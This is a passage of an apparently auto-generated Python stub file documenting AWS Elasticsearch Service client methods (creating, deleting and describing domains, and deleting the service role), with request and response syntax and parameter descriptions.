'CognitoOptions': {
'Enabled': True|False,
'UserPoolId': 'string',
'IdentityPoolId': 'string',
'RoleArn': 'string'
},
'EncryptionAtRestOptions': {
'Enabled': True|False,
'KmsKeyId': 'string'
},
'NodeToNodeEncryptionOptions': {
'Enabled': True|False
},
'AdvancedOptions': {
'string': 'string'
},
'LogPublishingOptions': {
'string': {
'CloudWatchLogsLogGroupArn': 'string',
'Enabled': True|False
}
},
'ServiceSoftwareOptions': {
'CurrentVersion': 'string',
'NewVersion': 'string',
'UpdateAvailable': True|False,
'Cancellable': True|False,
'UpdateStatus': 'PENDING_UPDATE'|'IN_PROGRESS'|'COMPLETED'|'NOT_ELIGIBLE'|'ELIGIBLE',
'Description': 'string',
'AutomatedUpdateDate': datetime(2015, 1, 1)
}
}
}
**Response Structure**
- *(dict) --*
The result of a ``CreateElasticsearchDomain`` operation. Contains the status of the newly created Elasticsearch domain.
- **DomainStatus** *(dict) --*
The status of the newly created Elasticsearch domain.
- **DomainId** *(string) --*
The unique identifier for the specified Elasticsearch domain.
- **DomainName** *(string) --*
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
- **ARN** *(string) --*
The Amazon resource name (ARN) of an Elasticsearch domain. See `Identifiers for IAM Entities <http://docs.aws.amazon.com/IAM/latest/UserGuide/index.html?Using_Identifiers.html>`__ in *Using AWS Identity and Access Management* for more information.
- **Created** *(boolean) --*
The domain creation status. ``True`` if the creation of an Elasticsearch domain is complete. ``False`` if domain creation is still in progress.
- **Deleted** *(boolean) --*
The domain deletion status. ``True`` if a delete request has been received for the domain but resource cleanup is still in progress. ``False`` if the domain has not been deleted. Once domain deletion is complete, the status of the domain is no longer returned.
- **Endpoint** *(string) --*
The Elasticsearch domain endpoint that you use to submit index and search requests.
- **Endpoints** *(dict) --*
Map containing the Elasticsearch domain endpoints used to submit index and search requests. Example ``key, value`` : ``'vpc','vpc-endpoint-h2dsd34efgyghrtguk5gt6j2foh4.us-east-1.es.amazonaws.com'`` .
- *(string) --*
- *(string) --*
The endpoint to which service requests are submitted. For example, ``search-imdb-movies-oopcnjfn6ugofer3zx5iadxxca.eu-west-1.es.amazonaws.com`` or ``doc-imdb-movies-oopcnjfn6ugofer3zx5iadxxca.eu-west-1.es.amazonaws.com`` .
- **Processing** *(boolean) --*
The status of the Elasticsearch domain configuration. ``True`` if Amazon Elasticsearch Service is processing configuration changes. ``False`` if the configuration is active.
- **UpgradeProcessing** *(boolean) --*
The status of an Elasticsearch domain version upgrade. ``True`` if Amazon Elasticsearch Service is undergoing a version upgrade. ``False`` if the configuration is active.
- **ElasticsearchVersion** *(string) --*
- **ElasticsearchClusterConfig** *(dict) --*
The type and number of instances in the domain cluster.
- **InstanceType** *(string) --*
The instance type for an Elasticsearch cluster.
- **InstanceCount** *(integer) --*
The number of instances in the specified domain cluster.
- **DedicatedMasterEnabled** *(boolean) --*
A boolean value to indicate whether a dedicated master node is enabled. See `About Dedicated Master Nodes <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-dedicatedmasternodes>`__ for more information.
- **ZoneAwarenessEnabled** *(boolean) --*
A boolean value to indicate whether zone awareness is enabled. See `About Zone Awareness <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-zoneawareness>`__ for more information.
- **ZoneAwarenessConfig** *(dict) --*
Specifies the zone awareness configuration for a domain when zone awareness is enabled.
- **AvailabilityZoneCount** *(integer) --*
An integer value to indicate the number of availability zones for a domain when zone awareness is enabled. This should be equal to number of subnets if VPC endpoints is enabled
- **DedicatedMasterType** *(string) --*
The instance type for a dedicated master node.
- **DedicatedMasterCount** *(integer) --*
Total number of dedicated master nodes, active and on standby, for the cluster.
- **EBSOptions** *(dict) --*
The ``EBSOptions`` for the specified domain. See `Configuring EBS-based Storage <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-ebs>`__ for more information.
- **EBSEnabled** *(boolean) --*
Specifies whether EBS-based storage is enabled.
- **VolumeType** *(string) --*
Specifies the volume type for EBS-based storage.
- **VolumeSize** *(integer) --*
Integer to specify the size of an EBS volume.
- **Iops** *(integer) --*
Specifies the IOPD for a Provisioned IOPS EBS volume (SSD).
- **AccessPolicies** *(string) --*
IAM access policy as a JSON-formatted string.
- **SnapshotOptions** *(dict) --*
Specifies the status of the ``SnapshotOptions``
- **AutomatedSnapshotStartHour** *(integer) --*
Specifies the time, in UTC format, when the service takes a daily automated snapshot of the specified Elasticsearch domain. Default value is ``0`` hours.
- **VPCOptions** *(dict) --*
The ``VPCOptions`` for the specified domain. For more information, see `VPC Endpoints for Amazon Elasticsearch Service Domains <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html>`__ .
- **VPCId** *(string) --*
The VPC Id for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- **SubnetIds** *(list) --*
Specifies the subnets for VPC endpoint.
- *(string) --*
- **AvailabilityZones** *(list) --*
The availability zones for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- *(string) --*
- **SecurityGroupIds** *(list) --*
Specifies the security groups for VPC endpoint.
- *(string) --*
- **CognitoOptions** *(dict) --*
The ``CognitoOptions`` for the specified domain. For more information, see `Amazon Cognito Authentication for Kibana <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html>`__ .
- **Enabled** *(boolean) --*
Specifies the option to enable Cognito for Kibana authentication.
- **UserPoolId** *(string) --*
Specifies the Cognito user pool ID for Kibana authentication.
- **IdentityPoolId** *(string) --*
Specifies the Cognito identity pool ID for Kibana authentication.
- **RoleArn** *(string) --*
Specifies the role ARN that provides Elasticsearch permissions for accessing Cognito resources.
- **EncryptionAtRestOptions** *(dict) --*
Specifies the status of the ``EncryptionAtRestOptions`` .
- **Enabled** *(boolean) --*
Specifies the option to enable Encryption At Rest.
- **KmsKeyId** *(string) --*
Specifies the KMS Key ID for Encryption At Rest options.
- **NodeToNodeEncryptionOptions** *(dict) --*
Specifies the status of the ``NodeToNodeEncryptionOptions`` .
- **Enabled** *(boolean) --*
Specify true to enable node-to-node encryption.
- **AdvancedOptions** *(dict) --*
Specifies the status of the ``AdvancedOptions``
- *(string) --*
- *(string) --*
- **LogPublishingOptions** *(dict) --*
Log publishing options for the given domain.
- *(string) --*
Type of Log File, it can be one of the following:
* INDEX_SLOW_LOGS: Index slow logs contain insert requests that took more time than configured index query log threshold to execute.
* SEARCH_SLOW_LOGS: Search slow logs contain search queries that took more time than configured search query log threshold to execute.
* ES_APPLICATION_LOGS: Elasticsearch application logs contain information about errors and warnings raised during the operation of the service and can be useful for troubleshooting.
- *(dict) --*
Log Publishing option that is set for given domain. Attributes and their details:
* CloudWatchLogsLogGroupArn: ARN of the Cloudwatch log group to which log needs to be published.
* Enabled: Whether the log publishing for given log type is enabled or not
- **CloudWatchLogsLogGroupArn** *(string) --*
ARN of the Cloudwatch log group to which log needs to be published.
- **Enabled** *(boolean) --*
Specifies whether given log publishing option is enabled or not.
- **ServiceSoftwareOptions** *(dict) --*
The current status of the Elasticsearch domain's service software.
- **CurrentVersion** *(string) --*
The current service software version that is present on the domain.
- **NewVersion** *(string) --*
The new service software version if one is available.
- **UpdateAvailable** *(boolean) --*
``True`` if you are able to update you service software version. ``False`` if you are not able to update your service software version.
- **Cancellable** *(boolean) --*
``True`` if you are able to cancel your service software version update. ``False`` if you are not able to cancel your service software version.
- **UpdateStatus** *(string) --*
The status of your service software update. This field can take the following values: ``ELIGIBLE`` , ``PENDING_UPDATE`` , ``IN_PROGRESS`` , ``COMPLETED`` , and ``NOT_ELIGIBLE`` .
- **Description** *(string) --*
The description of the ``UpdateStatus`` .
- **AutomatedUpdateDate** *(datetime) --*
Timestamp, in Epoch time, until which you can manually request a service software update. After this date, we automatically update your service software.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of the Elasticsearch domain that you are creating. Domain names are unique across the domains owned by an account within an AWS region. Domain names must start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
:type ElasticsearchVersion: string
:param ElasticsearchVersion:
String of format X.Y to specify version for the Elasticsearch domain eg. \"1.5\" or \"2.3\". For more information, see `Creating Elasticsearch Domains <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomains>`__ in the *Amazon Elasticsearch Service Developer Guide* .
:type ElasticsearchClusterConfig: dict
:param ElasticsearchClusterConfig:
Configuration options for an Elasticsearch domain. Specifies the instance type and number of instances in the domain cluster.
- **InstanceType** *(string) --*
The instance type for an Elasticsearch cluster.
- **InstanceCount** *(integer) --*
The number of instances in the specified domain cluster.
- **DedicatedMasterEnabled** *(boolean) --*
A boolean value to indicate whether a dedicated master node is enabled. See `About Dedicated Master Nodes <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-dedicatedmasternodes>`__ for more information.
- **ZoneAwarenessEnabled** *(boolean) --*
A boolean value to indicate whether zone awareness is enabled. See `About Zone Awareness <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-zoneawareness>`__ for more information.
- **ZoneAwarenessConfig** *(dict) --*
Specifies the zone awareness configuration for a domain when zone awareness is enabled.
- **AvailabilityZoneCount** *(integer) --*
An integer value to indicate the number of availability zones for a domain when zone awareness is enabled. This should be equal to number of subnets if VPC endpoints is enabled
- **DedicatedMasterType** *(string) --*
The instance type for a dedicated master node.
- **DedicatedMasterCount** *(integer) --*
Total number of dedicated master nodes, active and on standby, for the cluster.
:type EBSOptions: dict
:param EBSOptions:
Options to enable, disable and specify the type and size of EBS storage volumes.
- **EBSEnabled** *(boolean) --*
Specifies whether EBS-based storage is enabled.
- **VolumeType** *(string) --*
Specifies the volume type for EBS-based storage.
- **VolumeSize** *(integer) --*
Integer to specify the size of an EBS volume.
- **Iops** *(integer) --*
Specifies the IOPD for a Provisioned IOPS EBS volume (SSD).
:type AccessPolicies: string
:param AccessPolicies:
IAM access policy as a JSON-formatted string.
:type SnapshotOptions: dict
:param SnapshotOptions:
Option to set time, in UTC format, of the daily automated snapshot. Default value is 0 hours.
- **AutomatedSnapshotStartHour** *(integer) --*
Specifies the time, in UTC format, when the service takes a daily automated snapshot of the specified Elasticsearch domain. Default value is ``0`` hours.
:type VPCOptions: dict
:param VPCOptions:
Options to specify the subnets and security groups for VPC endpoint. For more information, see `Creating a VPC <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html#es-creating-vpc>`__ in *VPC Endpoints for Amazon Elasticsearch Service Domains*
- **SubnetIds** *(list) --*
Specifies the subnets for VPC endpoint.
- *(string) --*
- **SecurityGroupIds** *(list) --*
Specifies the security groups for VPC endpoint.
- *(string) --*
:type CognitoOptions: dict
:param CognitoOptions:
Options to specify the Cognito user and identity pools for Kibana authentication. For more information, see `Amazon Cognito Authentication for Kibana <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html>`__ .
- **Enabled** *(boolean) --*
Specifies the option to enable Cognito for Kibana authentication.
- **UserPoolId** *(string) --*
Specifies the Cognito user pool ID for Kibana authentication.
- **IdentityPoolId** *(string) --*
Specifies the Cognito identity pool ID for Kibana authentication.
- **RoleArn** *(string) --*
Specifies the role ARN that provides Elasticsearch permissions for accessing Cognito resources.
:type EncryptionAtRestOptions: dict
:param EncryptionAtRestOptions:
Specifies the Encryption At Rest Options.
- **Enabled** *(boolean) --*
Specifies the option to enable Encryption At Rest.
- **KmsKeyId** *(string) --*
Specifies the KMS Key ID for Encryption At Rest options.
:type NodeToNodeEncryptionOptions: dict
:param NodeToNodeEncryptionOptions:
Specifies the NodeToNodeEncryptionOptions.
- **Enabled** *(boolean) --*
Specify true to enable node-to-node encryption.
:type AdvancedOptions: dict
:param AdvancedOptions:
Option to allow references to indices in an HTTP request body. Must be ``false`` when configuring access to individual sub-resources. By default, the value is ``true`` . See `Configuration Advanced Options <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-advanced-options>`__ for more information.
- *(string) --*
- *(string) --*
:type LogPublishingOptions: dict
:param LogPublishingOptions:
Map of ``LogType`` and ``LogPublishingOption`` , each containing options to publish a given type of Elasticsearch log.
- *(string) --*
Type of Log File, it can be one of the following:
* INDEX_SLOW_LOGS: Index slow logs contain insert requests that took more time than configured index query log threshold to execute.
* SEARCH_SLOW_LOGS: Search slow logs contain search queries that took more time than configured search query log threshold to execute.
* ES_APPLICATION_LOGS: Elasticsearch application logs contain information about errors and warnings raised during the operation of the service and can be useful for troubleshooting.
- *(dict) --*
Log Publishing option that is set for given domain. Attributes and their details:
* CloudWatchLogsLogGroupArn: ARN of the Cloudwatch log group to which log needs to be published.
* Enabled: Whether the log publishing for given log type is enabled or not
- **CloudWatchLogsLogGroupArn** *(string) --*
ARN of the Cloudwatch log group to which log needs to be published.
- **Enabled** *(boolean) --*
Specifies whether given log publishing option is enabled or not.
:rtype: dict
:returns:
"""
pass
def delete_elasticsearch_domain(self, DomainName: str) -> Dict:
"""
Permanently deletes the specified Elasticsearch domain and all of its data. Once a domain is deleted, it cannot be recovered.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/DeleteElasticsearchDomain>`_
**Request Syntax**
::
response = client.delete_elasticsearch_domain(
DomainName='string'
)
**Response Syntax**
::
{
'DomainStatus': {
'DomainId': 'string',
'DomainName': 'string',
'ARN': 'string',
'Created': True|False,
'Deleted': True|False,
'Endpoint': 'string',
'Endpoints': {
'string': 'string'
},
'Processing': True|False,
'UpgradeProcessing': True|False,
'ElasticsearchVersion': 'string',
'ElasticsearchClusterConfig': {
'InstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'InstanceCount': 123,
'DedicatedMasterEnabled': True|False,
'ZoneAwarenessEnabled': True|False,
'ZoneAwarenessConfig': {
'AvailabilityZoneCount': 123
},
'DedicatedMasterType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'DedicatedMasterCount': 123
},
'EBSOptions': {
'EBSEnabled': True|False,
'VolumeType': 'standard'|'gp2'|'io1',
'VolumeSize': 123,
'Iops': 123
},
'AccessPolicies': 'string',
'SnapshotOptions': {
'AutomatedSnapshotStartHour': 123
},
'VPCOptions': {
'VPCId': 'string',
'SubnetIds': [
'string',
],
'AvailabilityZones': [
'string',
],
'SecurityGroupIds': [
'string',
]
},
'CognitoOptions': {
'Enabled': True|False,
'UserPoolId': 'string',
'IdentityPoolId': 'string',
'RoleArn': 'string'
},
'EncryptionAtRestOptions': {
'Enabled': True|False,
'KmsKeyId': 'string'
},
'NodeToNodeEncryptionOptions': {
'Enabled': True|False
},
'AdvancedOptions': {
'string': 'string'
},
'LogPublishingOptions': {
'string': {
'CloudWatchLogsLogGroupArn': 'string',
'Enabled': True|False
}
},
'ServiceSoftwareOptions': {
'CurrentVersion': 'string',
'NewVersion': 'string',
'UpdateAvailable': True|False,
'Cancellable': True|False,
'UpdateStatus': 'PENDING_UPDATE'|'IN_PROGRESS'|'COMPLETED'|'NOT_ELIGIBLE'|'ELIGIBLE',
'Description': 'string',
'AutomatedUpdateDate': datetime(2015, 1, 1)
}
}
}
**Response Structure**
- *(dict) --*
The result of a ``DeleteElasticsearchDomain`` request. Contains the status of the pending deletion, or no status if the domain and all of its resources have been deleted.
- **DomainStatus** *(dict) --*
The status of the Elasticsearch domain being deleted.
- **DomainId** *(string) --*
The unique identifier for the specified Elasticsearch domain.
- **DomainName** *(string) --*
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
- **ARN** *(string) --*
The Amazon resource name (ARN) of an Elasticsearch domain. See `Identifiers for IAM Entities <http://docs.aws.amazon.com/IAM/latest/UserGuide/index.html?Using_Identifiers.html>`__ in *Using AWS Identity and Access Management* for more information.
- **Created** *(boolean) --*
The domain creation status. ``True`` if the creation of an Elasticsearch domain is complete. ``False`` if domain creation is still in progress.
- **Deleted** *(boolean) --*
The domain deletion status. ``True`` if a delete request has been received for the domain but resource cleanup is still in progress. ``False`` if the domain has not been deleted. Once domain deletion is complete, the status of the domain is no longer returned.
- **Endpoint** *(string) --*
The Elasticsearch domain endpoint that you use to submit index and search requests.
- **Endpoints** *(dict) --*
Map containing the Elasticsearch domain endpoints used to submit index and search requests. Example ``key, value`` : ``'vpc','vpc-endpoint-h2dsd34efgyghrtguk5gt6j2foh4.us-east-1.es.amazonaws.com'`` .
- *(string) --*
- *(string) --*
The endpoint to which service requests are submitted. For example, ``search-imdb-movies-oopcnjfn6ugofer3zx5iadxxca.eu-west-1.es.amazonaws.com`` or ``doc-imdb-movies-oopcnjfn6ugofer3zx5iadxxca.eu-west-1.es.amazonaws.com`` .
- **Processing** *(boolean) --*
The status of the Elasticsearch domain configuration. ``True`` if Amazon Elasticsearch Service is processing configuration changes. ``False`` if the configuration is active.
- **UpgradeProcessing** *(boolean) --*
The status of an Elasticsearch domain version upgrade. ``True`` if Amazon Elasticsearch Service is undergoing a version upgrade. ``False`` if the configuration is active.
- **ElasticsearchVersion** *(string) --*
- **ElasticsearchClusterConfig** *(dict) --*
The type and number of instances in the domain cluster.
- **InstanceType** *(string) --*
The instance type for an Elasticsearch cluster.
- **InstanceCount** *(integer) --*
The number of instances in the specified domain cluster.
- **DedicatedMasterEnabled** *(boolean) --*
A boolean value to indicate whether a dedicated master node is enabled. See `About Dedicated Master Nodes <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-dedicatedmasternodes>`__ for more information.
- **ZoneAwarenessEnabled** *(boolean) --*
A boolean value to indicate whether zone awareness is enabled. See `About Zone Awareness <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-zoneawareness>`__ for more information.
- **ZoneAwarenessConfig** *(dict) --*
Specifies the zone awareness configuration for a domain when zone awareness is enabled.
- **AvailabilityZoneCount** *(integer) --*
An integer value to indicate the number of availability zones for a domain when zone awareness is enabled. This should be equal to number of subnets if VPC endpoints is enabled
- **DedicatedMasterType** *(string) --*
The instance type for a dedicated master node.
- **DedicatedMasterCount** *(integer) --*
Total number of dedicated master nodes, active and on standby, for the cluster.
- **EBSOptions** *(dict) --*
The ``EBSOptions`` for the specified domain. See `Configuring EBS-based Storage <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-ebs>`__ for more information.
- **EBSEnabled** *(boolean) --*
Specifies whether EBS-based storage is enabled.
- **VolumeType** *(string) --*
Specifies the volume type for EBS-based storage.
- **VolumeSize** *(integer) --*
Integer to specify the size of an EBS volume.
- **Iops** *(integer) --*
Specifies the IOPD for a Provisioned IOPS EBS volume (SSD).
- **AccessPolicies** *(string) --*
IAM access policy as a JSON-formatted string.
- **SnapshotOptions** *(dict) --*
Specifies the status of the ``SnapshotOptions``
- **AutomatedSnapshotStartHour** *(integer) --*
Specifies the time, in UTC format, when the service takes a daily automated snapshot of the specified Elasticsearch domain. Default value is ``0`` hours.
- **VPCOptions** *(dict) --*
The ``VPCOptions`` for the specified domain. For more information, see `VPC Endpoints for Amazon Elasticsearch Service Domains <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html>`__ .
- **VPCId** *(string) --*
The VPC Id for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- **SubnetIds** *(list) --*
Specifies the subnets for VPC endpoint.
- *(string) --*
- **AvailabilityZones** *(list) --*
The availability zones for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- *(string) --*
- **SecurityGroupIds** *(list) --*
Specifies the security groups for VPC endpoint.
- *(string) --*
- **CognitoOptions** *(dict) --*
The ``CognitoOptions`` for the specified domain. For more information, see `Amazon Cognito Authentication for Kibana <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html>`__ .
- **Enabled** *(boolean) --*
Specifies the option to enable Cognito for Kibana authentication.
- **UserPoolId** *(string) --*
Specifies the Cognito user pool ID for Kibana authentication.
- **IdentityPoolId** *(string) --*
Specifies the Cognito identity pool ID for Kibana authentication.
- **RoleArn** *(string) --*
Specifies the role ARN that provides Elasticsearch permissions for accessing Cognito resources.
- **EncryptionAtRestOptions** *(dict) --*
Specifies the status of the ``EncryptionAtRestOptions`` .
- **Enabled** *(boolean) --*
Specifies the option to enable Encryption At Rest.
- **KmsKeyId** *(string) --*
Specifies the KMS Key ID for Encryption At Rest options.
- **NodeToNodeEncryptionOptions** *(dict) --*
Specifies the status of the ``NodeToNodeEncryptionOptions`` .
- **Enabled** *(boolean) --*
Specify true to enable node-to-node encryption.
- **AdvancedOptions** *(dict) --*
Specifies the status of the ``AdvancedOptions``
- *(string) --*
- *(string) --*
- **LogPublishingOptions** *(dict) --*
Log publishing options for the given domain.
- *(string) --*
Type of Log File, it can be one of the following:
* INDEX_SLOW_LOGS: Index slow logs contain insert requests that took more time than configured index query log threshold to execute.
* SEARCH_SLOW_LOGS: Search slow logs contain search queries that took more time than configured search query log threshold to execute.
* ES_APPLICATION_LOGS: Elasticsearch application logs contain information about errors and warnings raised during the operation of the service and can be useful for troubleshooting.
- *(dict) --*
Log Publishing option that is set for given domain. Attributes and their details:
* CloudWatchLogsLogGroupArn: ARN of the Cloudwatch log group to which log needs to be published.
* Enabled: Whether the log publishing for given log type is enabled or not
- **CloudWatchLogsLogGroupArn** *(string) --*
ARN of the Cloudwatch log group to which log needs to be published.
- **Enabled** *(boolean) --*
Specifies whether given log publishing option is enabled or not.
- **ServiceSoftwareOptions** *(dict) --*
The current status of the Elasticsearch domain's service software.
- **CurrentVersion** *(string) --*
The current service software version that is present on the domain.
- **NewVersion** *(string) --*
The new service software version if one is available.
- **UpdateAvailable** *(boolean) --*
``True`` if you are able to update you service software version. ``False`` if you are not able to update your service software version.
- **Cancellable** *(boolean) --*
``True`` if you are able to cancel your service software version update. ``False`` if you are not able to cancel your service software version.
- **UpdateStatus** *(string) --*
The status of your service software update. This field can take the following values: ``ELIGIBLE`` , ``PENDING_UPDATE`` , ``IN_PROGRESS`` , ``COMPLETED`` , and ``NOT_ELIGIBLE`` .
- **Description** *(string) --*
The description of the ``UpdateStatus`` .
- **AutomatedUpdateDate** *(datetime) --*
Timestamp, in Epoch time, until which you can manually request a service software update. After this date, we automatically update your service software.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of the Elasticsearch domain that you want to permanently delete.
:rtype: dict
:returns:
"""
pass
def delete_elasticsearch_service_role(self):
"""
Deletes the service-linked role that Elasticsearch Service uses to manage and maintain VPC domains. Role deletion will fail if any existing VPC domains use the role. You must delete any such Elasticsearch domains before deleting the role. See `Deleting Elasticsearch Service Role <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html#es-enabling-slr>`__ in *VPC Endpoints for Amazon Elasticsearch Service Domains* .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/DeleteElasticsearchServiceRole>`_
**Request Syntax**
::
response = client.delete_elasticsearch_service_role()
:returns: None
"""
pass
def describe_elasticsearch_domain(self, DomainName: str) -> Dict:
"""
Returns domain configuration information about the specified Elasticsearch domain, including the domain ID, domain endpoint, and domain ARN.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/DescribeElasticsearchDomain>`_
**Request Syntax**
::
response = client.describe_elasticsearch_domain(
DomainName='string'
)
**Response Syntax**
::
{
'DomainStatus': {
'DomainId': 'string',
'DomainName': 'string',
'ARN': 'string',
'Created': True|False,
'Deleted': True|False,
'Endpoint': 'string',
'Endpoints': {
'string': 'string'
},
'Processing': True|False,
'UpgradeProcessing': True|False,
'ElasticsearchVersion': 'string',
'ElasticsearchClusterConfig': {
'InstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'InstanceCount': 123,
'DedicatedMasterEnabled': True|False,
'ZoneAwarenessEnabled': True|False,
'ZoneAwarenessConfig': {
'AvailabilityZoneCount': 123
},
'DedicatedMasterType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'DedicatedMasterCount': 123
},
'EBSOptions': {
'EBSEnabled': True|False,
'VolumeType': 'standard'|'gp2'|'io1',
'VolumeSize': 123,
'Iops': 123
},
'AccessPolicies': 'string',
'SnapshotOptions': {
'AutomatedSnapshotStartHour': 123
},
'VPCOptions': {
'VPCId': 'string',
'SubnetIds': [
'string',
],
